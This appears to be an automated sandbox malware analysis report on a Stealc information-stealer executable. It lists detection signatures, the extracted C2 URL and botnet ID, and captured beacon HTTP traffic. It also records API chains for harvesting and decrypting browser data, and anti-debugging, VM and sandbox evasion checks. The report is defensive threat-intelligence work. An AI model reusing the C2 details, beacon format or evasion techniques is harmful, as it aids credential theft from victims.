Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1529173
MD5: 1666bdf952c77a910f9c69f491d5cc4b
SHA1: e761daca0c544764e242bc6a2c17cbedc8c15c8c
SHA256: 4996064a6dc50f76d60d6aa783d5baafa7260930c0318f0762ba5c64f67ced64
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1666BDF952C77A910F9C69F491D5CC4B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, namely sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7048 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7048 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.fa0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T17:32:02.906806+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.fa0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00FAC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00FA9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00FA7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00FA9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00FB8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00FB38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FB4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FADA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00FAE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00FB4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00FAED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FA16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FAF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00FB3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FABE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FADE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------HJDBAFIECGHCBFIDGDAA
    Content-Disposition: form-data; name="hwid"

    AF1D98BA88AD2322695909
    ------HJDBAFIECGHCBFIDGDAA
    Content-Disposition: form-data; name="build"

    doma
    ------HJDBAFIECGHCBFIDGDAA--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00FA4880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------HJDBAFIECGHCBFIDGDAA
    Content-Disposition: form-data; name="hwid"

    AF1D98BA88AD2322695909
    ------HJDBAFIECGHCBFIDGDAA
    Content-Disposition: form-data; name="build"

    doma
    ------HJDBAFIECGHCBFIDGDAA--
Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/?2
Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)2
Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3/
Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4
Source: file.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu2
Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw/
Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37LjG30S

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 | 0_2_01381116
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D611B | 0_2_012D611B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139F1AB | 0_2_0139F1AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137198C | 0_2_0137198C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137F010 | 0_2_0137F010
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013768E2 | 0_2_013768E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01274B01 | 0_2_01274B01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01378342 | 0_2_01378342
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01337BBE | 0_2_01337BBE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137BA0D | 0_2_0137BA0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01291AF4 | 0_2_01291AF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F0521 | 0_2_013F0521
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137343B | 0_2_0137343B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01367CBF | 0_2_01367CBF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136E486 | 0_2_0136E486
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012B2F2D | 0_2_012B2F2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136FF7E | 0_2_0136FF7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136C7F6 | 0_2_0136C7F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01237FE2 | 0_2_01237FE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01379E92 | 0_2_01379E92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01374E82 | 0_2_01374E82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133E684 | 0_2_0133E684
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FA45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: pvatzxoj ZLIB complexity 0.9949661905731635
Source: file.exe, 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00FB8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00FB3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7LST3YBV.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1885184 > 1048576
Source: file.exe | Static PE information: Raw size of pvatzxoj is bigger than: 0x100000 < 0x1a6000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pvatzxoj:EW;ilwoqlxb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pvatzxoj:EW;ilwoqlxb:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FB9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ce7fa should be: 0x1dbeb3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: pvatzxoj
Source: file.exe | Static PE information: section name: ilwoqlxb
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139813E push eax; mov dword ptr [esp], ecx | 0_2_01398148
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143F944 push ecx; mov dword ptr [esp], ebp | 0_2_0143F963
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143F944 push 0DF4D69Fh; mov dword ptr [esp], ebp | 0_2_0143F985
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push eax; mov dword ptr [esp], esi | 0_2_0138116D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 3120CB4Dh; mov dword ptr [esp], ecx | 0_2_01381180
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 6878058Dh; mov dword ptr [esp], esi | 0_2_01381193
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 1D978808h; mov dword ptr [esp], ecx | 0_2_013811F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 792926E5h; mov dword ptr [esp], edx | 0_2_01381214
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edx; mov dword ptr [esp], eax | 0_2_01381280
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ecx; mov dword ptr [esp], esi | 0_2_0138137F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edi; mov dword ptr [esp], esp | 0_2_01381386
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edx; mov dword ptr [esp], 5AB653EAh | 0_2_01381459
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ecx; mov dword ptr [esp], eax | 0_2_01381492
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 1B516881h; mov dword ptr [esp], ecx | 0_2_013814CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ecx; mov dword ptr [esp], 02046AA4h | 0_2_01381528
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 05F1F7BBh; mov dword ptr [esp], edi | 0_2_0138161E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebx; mov dword ptr [esp], esi | 0_2_01381676
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edi; mov dword ptr [esp], ecx | 0_2_013816BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebp; mov dword ptr [esp], edi | 0_2_013816D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edi; mov dword ptr [esp], esi | 0_2_01381718
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebx; mov dword ptr [esp], 3455C177h | 0_2_0138174D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 1E0852C6h; mov dword ptr [esp], eax | 0_2_0138176A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebp; mov dword ptr [esp], eax | 0_2_01381793
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edi; mov dword ptr [esp], 000014D4h | 0_2_01381810
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ecx; mov dword ptr [esp], esp | 0_2_01381822
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebx; mov dword ptr [esp], 19483A00h | 0_2_01381836
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push edx; mov dword ptr [esp], ebx | 0_2_013818B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push esi; mov dword ptr [esp], edx | 0_2_0138192B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push eax; mov dword ptr [esp], edi | 0_2_0138193B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push ebp; mov dword ptr [esp], 08A2A946h | 0_2_01381968
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01381116 push 6100148Fh; mov dword ptr [esp], edx | 0_2_01381990
Source: file.exe | Static PE information: section name: pvatzxoj entropy: 7.953433050296438

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FB9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13747
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1201A16 second address: 1201A1A instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1201A1A second address: 1201A20 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1201A20 second address: 1201A25 instructions:
    0x00000000 rdtsc
    0x00000002 push ecx
    0x00000003 push eax
    0x00000004 push edx
    0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368DA2 second address: 1368DBB instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007FFAE905AE14h
    0x00000007 pushad
    0x00000008 push eax
    0x00000009 push edx
    0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368DBB second address: 1368DC7 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 ja 00007FFAE90574C6h
    0x0000000a push eax
    0x0000000b push edx
    0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384E3C second address: 1384E42 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 push eax
    0x00000005 push edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13850C1 second address: 13850C5 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13850C5 second address: 13850C9 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1385226 second address: 138522C instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 push eax
    0x00000005 push edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138522C second address: 1385232 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pushad
    0x00000005 popad
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13853B7 second address: 13853BD instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 push edx
    0x00000005 pop edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13853BD second address: 13853DB instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007FFAE905AE18h
    0x00000007 push edx
    0x00000008 pop edx
    0x00000009 pop edx
    0x0000000a pop eax
    0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138863F second address: 1388644 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388644 second address: 1388681 instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007FFAE905AE0Bh
    0x00000007 pop edx
    0x00000008 pop eax
    0x00000009 mov eax, dword ptr [eax]
    0x0000000b jns 00007FFAE905AE22h
    0x00000011 mov dword ptr [esp+04h], eax
    0x00000015 push eax
    0x00000016 push edx
    0x00000017 push eax
    0x00000018 push edx
    0x00000019 push eax
    0x0000001a push edx
    0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388681 second address: 1388685 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388685 second address: 138868B instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 popad
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138868B second address: 1201A16 instructions:
    0x00000000 rdtsc
    0x00000002 jno 00007FFAE90574C8h
    0x00000008 pop edx
    0x00000009 pop eax
    0x0000000a pop eax
    0x0000000b pushad
    0x0000000c mov edx, ecx
    0x0000000e sub dword ptr [ebp+122D1C9Bh], eax
    0x00000014 popad
